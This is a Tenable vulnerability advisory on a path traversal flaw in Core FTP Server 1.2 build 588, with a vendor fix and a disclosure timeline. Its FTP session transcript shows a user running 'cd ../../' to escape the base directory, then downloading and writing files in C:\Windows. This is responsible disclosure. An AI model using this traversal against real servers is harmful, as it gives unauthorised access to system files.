Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Core FTP Server Path Traversal Arbitrary File/Directory Access

Medium

Synopsis

Configuration

Core FTP Server 1.2 build 588 (32 bit or 64 bit) released on April 7, 2016 was installed. This finding is based on setting the “domain properties” via the GUI so that the “Base directory” is C:\Users\Public and the authentication method “Enable WinNT users” is checked. The “Enable WinNT” authentication method allows the remote user to log in as one of the existing Windows users. No other major settings have been altered. On the server where Core FTP Server is installed, there is a native Windows administrative user cleverly named “admin” we added.

A Case of Documentation?

The documentation for Core FTP server is fairly minimal, enough to get it configured and working. However, the "Enable WinNT users" functionality (can see the little check box in the second image at http://www.coreftp.com/server/help/Create_Domain.htm) doesn't come with any warning or explanation as to what that means, other than the content of using the native Windows accounts for authentication. Historically, FTP servers set a 'base directory' much like web servers set 'docroot', with the intention of that location being the highest up the directory tree one could access. Historical traversal attacks would bypass that limitation allowing access to files and/or directories on the system. Based on the relevant documentation:

   http://www.coreftp.com/server/help/help_/GettingStarted.htm
   5:  Chose a base directory where all directories and user directories will exist.
   If you are choosing a networked drive, you may need to modify the account in the Core FTP Server's service properties, as the system account may not have access to the network drive.

   http://www.coreftp.com/server/help/Add_account.htm
   As a reminder, if you lock a user in their home directory, they will not be able to access virtual paths.

However, locking a user in the home directory doesn't work with NT Auth. Based on the above, an administrator installing Core FTP may expect that it should limit users to the configured Base Directory and subdirectories only.

Relative Path Traversal

Logging in as "admin" to the target machine when 'Enable WinNT users' is configured, Core FTP Server should probably restrict any user to C:\Users\Public and its subdirectories. However, using a simple traversal (e.g. ../../) via the 'cd' command, an attacker can traverse directories to see “C:\”, download files (e.g. win.ini from C:\Windows), and create files (e.g. “albino_lobster.txt” to C:\Windows):


madagascar:~ tenrec$ ftp [email protected]
Connected to 192.168.1.3.
220-Core FTP Server Version 1.2, build 588, 64-bit, installed 0 days ago Unregistered
220-Hello Friend
220 
331 password required for admin
Password: 
230-Logged on
230 
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,224).
150 Opening ASCII mode data connection
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Capybara
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Downloads
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Music
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Pictures
dr-xr-xr-x   1 owner    group               0 Nov 21  2010 Recorded TV
dr-xr-xr-x   1 owner    group               0 Jul 14  2009 Warez
226 Transfer Complete
ftp> cd ../../
250 CWD command successful
ftp> pwd
Remote directory: /
ftp> ls
227 Entering Passive Mode (192,168,1,3,237,227).
150 Opening ASCII mode data connection
dr-xr-xrwx   1 owner    group               0 Apr  4 12:39 cygwin65
dr-xr-xr-x   1 owner    group               0 Apr 18 10:30 Program Files
dr-xr-xr-x   1 owner    group               0 Apr 18 13:54 Program Files (x86)
dr-xr-xrwx   1 owner    group               0 Apr 18 10:29 Python9000
dr-xr-xr-x   1 owner    group               0 Apr 18 14:59 Users
dr-xr-xrwx   1 owner    group               0 Apr 18 16:58 Windows
226 Transfer Complete
ftp> cd Windows
250 CWD command successful
ftp> get win.ini
local: win.ini remote: win.ini
227 Entering Passive Mode (192,168,1,3,237,248).
150 RETR command started
   403        2.88 MiB/s 
226 Transfer Complete
403 bytes received in 00:00 (1.32 MiB/s)
ftp> put albino_lobster.txt 
local: albino_lobster.txt remote: albino_lobster.txt
227 Entering Passive Mode (192,168,1,3,238,4).
150 STOR command started
100% |********************************************************************************************************|     4        2.00 KiB/s    00:00 ETA
226 Transfer Complete
4 bytes sent in 00:00 (1.52 KiB/s)

Note that if you log in as a non-administrator, you cannot write to C:\Windows.

Solution

Upgrade to Core FTP Server 1.2, build 589 to resolve this issue. Note that the Build 588 forum post was edited by Core FTP to mention 589, thus appearing to be backdated.

Tenable would like to acknowledge not only the quick response time in emails, but the incredibly fast turnaround on providing a new build to resolve this issue. Outstanding work.

Disclosure Timeline

2016-04-18 - Issue discovered
2016-04-29 - Reported to vendor via [email protected]
2016-04-29 - Vendor acks issue, working on patch
2016-04-29 - Vendor replies, Build 589 released to address issue
2016-05-02 - Tenable confirms updated build fixes issue

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]